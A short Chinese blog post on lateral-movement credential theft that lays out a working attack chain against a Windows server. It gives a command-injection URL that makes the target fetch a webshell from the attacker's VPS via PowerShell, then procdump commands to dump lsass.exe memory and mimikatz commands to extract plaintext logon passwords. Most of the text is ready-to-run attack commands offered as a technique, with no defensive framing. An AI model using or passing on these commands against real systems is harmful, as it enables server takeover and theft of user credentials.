内网渗透之简单明文抓取

前提:

存在命令执行的windows服务器

利用:

1,将一句话木马上传到自己的vps上,通过命令执行漏洞,执行命令将一句话木马下载到服务器当中(需要知道绝对路径)

http://url?pwd=zs&cmd=cmd+/c+powershell+(new-object System.Net.WebClient).DownloadFile('http://vps/shell.txt','C:/绝对路径/shy.jsp')

2,使用菜刀进行连接,上传procdump64.exe抓取lsass.exe进程

./procdump64.exe -accepteula -ma lsass.exe lsass.dmp

内网渗透之简单明文抓取_第1张图片

3,将抓取到的lsass.dmp拷贝到本地,在本地使用mimikatz抓取明文

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

看只要密码强度够,就抓不到明文,就不上图了。

 

 

 

 

你可能感兴趣的:(内网渗透)